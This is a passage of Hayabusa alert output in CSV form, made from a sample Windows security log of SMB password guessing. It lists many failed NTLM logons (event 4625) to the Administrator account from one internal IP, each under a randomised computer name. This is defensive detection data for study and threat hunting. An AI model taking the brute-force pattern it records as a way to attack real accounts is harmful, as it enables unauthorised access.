Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.402 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.779 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.823 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:36.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.351 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.448 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.490 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.163 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.347 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.714 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.985 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.027 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.119 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:38.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 
